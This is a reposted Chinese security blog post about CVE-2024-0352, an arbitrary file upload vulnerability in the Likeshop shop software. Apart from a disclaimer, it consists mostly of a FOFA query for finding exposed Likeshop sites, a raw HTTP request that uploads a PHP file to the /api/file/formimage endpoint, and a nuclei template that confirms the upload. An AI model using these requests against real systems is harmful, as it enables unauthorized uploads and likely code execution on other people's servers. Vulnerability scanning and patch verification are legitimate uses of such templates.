Likeshop任意文件上传漏洞(CVE-2024-0352)

admin 2024年1月20日10:18:50评论48 views字数 1216阅读4分3秒阅读模式

一、免责声明:

      本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!

二、产品介绍:

Likeshop任意文件上传漏洞(CVE-2024-0352)

三、资产梳理:

fofa: title="Likeshop"

四、漏洞复现:

Likeshop任意文件上传漏洞(CVE-2024-0352)

五、POC:

POST /api/file/formimage HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enContent-Length: 179------WebKitFormBoundarygcflwteiContent-Disposition: form-data; name="file";filename="1.php"Content-Type: application/x-phptesttest------WebKitFormBoundarygcflwtei--

nuclei:

id: Likeshop_uploadinfo:  name: Likeshop_upload  author: joyboy  severity: critical  description: |    Likeshop任意文件上传漏洞CVE-2024-0352  metadata:    max-request: 1    verified: true    fofa-query: title="Likeshop"  tags: cvehttp:  - raw:      - |-        POST /api/file/formimage HTTP/1.1        Host: {{Hostname}}        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei        ------WebKitFormBoundarygcflwtei        Content-Disposition: form-data; name="file";filename="test.php"        Content-Type: application/x-php        testtest        ------WebKitFormBoundarygcflwtei--    matchers-condition: and    matchers:      - type: word        part: body        words:          - '上传文件成功'      - type: status        status:          - 200

原文始发于微信公众号(fly的渗透学习笔记):Likeshop任意文件上传漏洞(CVE-2024-0352)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月20日10:18:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Likeshop任意文件上传漏洞(CVE-2024-0352)https://cn-sec.com/archives/2412513.html

发表评论

匿名网友 填写信息